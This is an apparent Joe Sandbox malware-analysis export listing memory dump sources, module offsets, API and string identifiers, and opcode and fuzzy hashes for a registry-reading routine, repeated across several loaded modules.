                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 724834400780d6935085e559911a7bd4e5cf6f6d5c5b92713232e329f0929a47
                                                                                                                  • Instruction ID: cd722ace68ff9a3f43e0d4812bbc5fa3c8a246af3d7af8f78eff81c1a3d9e594
                                                                                                                  • Opcode Fuzzy Hash: 724834400780d6935085e559911a7bd4e5cf6f6d5c5b92713232e329f0929a47
                                                                                                                  • Instruction Fuzzy Hash: 32F0C2B260878641E752EF00B850BBDA658AF407B4F880237ED1D4B790EFADD989D314
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: c7bbc6c4fc02fbab84f793ef43b03842e8cb9eedb3d504b0ba223d5091b1599e
                                                                                                                  • Instruction ID: 2802ce071b68aa4c671dbc533f1a01735132adc758d41245b6a6795477af3971
                                                                                                                  • Opcode Fuzzy Hash: c7bbc6c4fc02fbab84f793ef43b03842e8cb9eedb3d504b0ba223d5091b1599e
                                                                                                                  • Instruction Fuzzy Hash: 0DF0C2B260868641E752AF00B850BBDA654BF407B4F880237ED1D4B690EFADD989D314
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: ebdae4b96f3f95e7b28ed2350476ef876414ddba6212645e21a53aa2eb10d1c1
                                                                                                                  • Instruction ID: 55dfa2ca888506901f1dfd42bef8e8c2eb36cbe499f08f99d7185739e863eeae
                                                                                                                  • Opcode Fuzzy Hash: ebdae4b96f3f95e7b28ed2350476ef876414ddba6212645e21a53aa2eb10d1c1
                                                                                                                  • Instruction Fuzzy Hash: A5F0C2B260878641E752EF00B850BBDA654AF407B4F880237ED1D4B790EFADD989D314
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 9569925857baad9d83274aefa34eeb2a47794240e04e45bf96f4fb7c4f6da266
                                                                                                                  • Instruction ID: 2b1d922870b8a4e11522d38320263b089304f6033be5a4dc0ed6b4e01e1f5293
                                                                                                                  • Opcode Fuzzy Hash: 9569925857baad9d83274aefa34eeb2a47794240e04e45bf96f4fb7c4f6da266
                                                                                                                  • Instruction Fuzzy Hash: F0F0C222609E4682EB669F01B840BB96258AF407B8F08127AED4D466A0EF3DD9899300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 090d597a9b1f28875ad6d45f6679cbd5da47c45444663eb49efbe71bafab15ff
                                                                                                                  • Instruction ID: b0ad78e084ff3bea241017f0a19f5371ac2c5e0afdfc43087496b4d091f1013a
                                                                                                                  • Opcode Fuzzy Hash: 090d597a9b1f28875ad6d45f6679cbd5da47c45444663eb49efbe71bafab15ff
                                                                                                                  • Instruction Fuzzy Hash: CEF0F62260DE46C2EB669F01B840BF9625CAF407B8F48127AED1D466B0EF3DD985C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 7540e1a66fc6686d969aba4d5a662a22a3092066e406f677bd1371b9416a87bc
                                                                                                                  • Instruction ID: f5a24c5d2604c28c85dbb46fcfcfc9db76e6f4ab14373fd96b1f309b6f2af96a
                                                                                                                  • Opcode Fuzzy Hash: 7540e1a66fc6686d969aba4d5a662a22a3092066e406f677bd1371b9416a87bc
                                                                                                                  • Instruction Fuzzy Hash: 1BF0F62260DE46C2EB669F01BC40BF9625CAF407B8F48127AED1D462B0EF3DDA85C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 1f1443341065272b26f8778fb621d4f4bce8ddecc7e485dcee93d47f1416b181
                                                                                                                  • Instruction ID: a874fea395f09788b98e54c46d48dc7dd4fa161c8ec5da9421a9e695079e4904
                                                                                                                  • Opcode Fuzzy Hash: 1f1443341065272b26f8778fb621d4f4bce8ddecc7e485dcee93d47f1416b181
                                                                                                                  • Instruction Fuzzy Hash: BAF0F62260DF4AC2EB669F01B840BF9625CAF407B8F48127AED1D462B0EF3DD985C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: e638fd45968e93b56570e475a3f40e1af91e8fb340a94d33487af47f6295cefe
                                                                                                                  • Instruction ID: a5ab2e76d18dbbbaf42bc4d887050e94cec06119b76ed3bcd99bef45ef9aad80
                                                                                                                  • Opcode Fuzzy Hash: e638fd45968e93b56570e475a3f40e1af91e8fb340a94d33487af47f6295cefe
                                                                                                                  • Instruction Fuzzy Hash: B5F0C222609E4682EB669F01B840BB96258AF407B8F48127AED1C462A0EF3DD9898300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 424ba5455938f236fac436dcf4ae9aadb890f1c2ac7e3e5af8e49b89b625ef02
                                                                                                                  • Instruction ID: db43d19751cb65ce27c1e807ae4375d377ac2bbdda315afc80e32071be2c115b
                                                                                                                  • Opcode Fuzzy Hash: 424ba5455938f236fac436dcf4ae9aadb890f1c2ac7e3e5af8e49b89b625ef02
                                                                                                                  • Instruction Fuzzy Hash: F1F0F622708F0645F5528F09BD403B92254EF42BB5F4812F7DE0D866F0EF2DD99A9700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 2faf2f3caf5ef6f57b80b72ea57377b3f3ff29defbd56a9ac594fe738afb101b
                                                                                                                  • Instruction ID: cf4c55651dae0b42f104f150323be5bd467f082602e9b0bf2ed311b89ad421f1
                                                                                                                  • Opcode Fuzzy Hash: 2faf2f3caf5ef6f57b80b72ea57377b3f3ff29defbd56a9ac594fe738afb101b
                                                                                                                  • Instruction Fuzzy Hash: 57F0C222708F0A45E5528B09BD403B92254EF42BB6F4812F7DE0D866A0EF2DD9969700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 84a45d850fdba3fedfb5a213ccd54f220f83ce82fc5a7113232f6b3206bf8a8c
                                                                                                                  • Instruction ID: e36e7a11ca1abc7a33ca8fe76f6aa617cd06dd71bea6d3570993ac786596f486
                                                                                                                  • Opcode Fuzzy Hash: 84a45d850fdba3fedfb5a213ccd54f220f83ce82fc5a7113232f6b3206bf8a8c
                                                                                                                  • Instruction Fuzzy Hash: 5CF0C222708F0646E5528B09BD403B96254EF42BB5F4812F7DE0D866A0EF2DD9969700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 7a84f77e9ee0064dee28e6b77a36bf4564d917fdea38d4ba1f4fc8436f7b6790
                                                                                                                  • Instruction ID: eeb21dcd2826bdbc18c02589676b4fcc16246ca03a5689db1eb695015f43eab6
                                                                                                                  • Opcode Fuzzy Hash: 7a84f77e9ee0064dee28e6b77a36bf4564d917fdea38d4ba1f4fc8436f7b6790
                                                                                                                  • Instruction Fuzzy Hash: 7DF0C222708F0645E5528B09BD403B92254EF42BB5F4812F7DE0D866A0EF2DD9969700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: fdaef4cc25d2ac96986bffaf8db08b575f5725428e0afe03a9dd4b28200432cf
                                                                                                                  • Instruction ID: 82a845ba1cf621b26b2de9525f06f3ff835bfe6cbee9829f0394daae77ef823e
                                                                                                                  • Opcode Fuzzy Hash: fdaef4cc25d2ac96986bffaf8db08b575f5725428e0afe03a9dd4b28200432cf
                                                                                                                  • Instruction Fuzzy Hash: 30F0C222708F0645E5528B09BD403B92254EF42BB5F4802F7DE4D866A0EF2DD99A9700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 836da29611261b5cb4dbd78cd3cc8a1c01468ffbe523f58c517336aa61ae090f
                                                                                                                  • Instruction ID: 60ac86a7d86974290c93d1aaa77db12a4775b62addf94d75969356860d5da021
                                                                                                                  • Opcode Fuzzy Hash: 836da29611261b5cb4dbd78cd3cc8a1c01468ffbe523f58c517336aa61ae090f
                                                                                                                  • Instruction Fuzzy Hash: A2F09662609A4642EA52DF02FC403F96255FF447B4F480275ED5D466F4EFADE9498700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: e4929cb0ceebbe4cf362d5102f3a33b2129b4af8d3ac052cf6a09f6a1d38304a
                                                                                                                  • Instruction ID: 1f274714fa9bd80b2a41eb6ab071cc4d3cb1d6c3801248c6fe75071297ee3e5b
                                                                                                                  • Opcode Fuzzy Hash: e4929cb0ceebbe4cf362d5102f3a33b2129b4af8d3ac052cf6a09f6a1d38304a
                                                                                                                  • Instruction Fuzzy Hash: B0F0F622609B0A42EA52DF02BC403F92254EF447B4F080275ED1D466F0EFADE9498300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                  • Opcode ID: 70ac4d1a8fc6581fe29d7919f64be475523010afe1560448bc959083e2c7b55a
                                                                                                                  • Instruction ID: 470f087734cac784e2ae8594907938e1ab12fab53415857c302a17654bc23067
                                                                                                                  • Opcode Fuzzy Hash: 70ac4d1a8fc6581fe29d7919f64be475523010afe1560448bc959083e2c7b55a
                                                                                                                  • Instruction Fuzzy Hash: FCF09662609A4642EA52DF02BC403F96255EF447B4F480276ED5D466F4EFADE9498700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
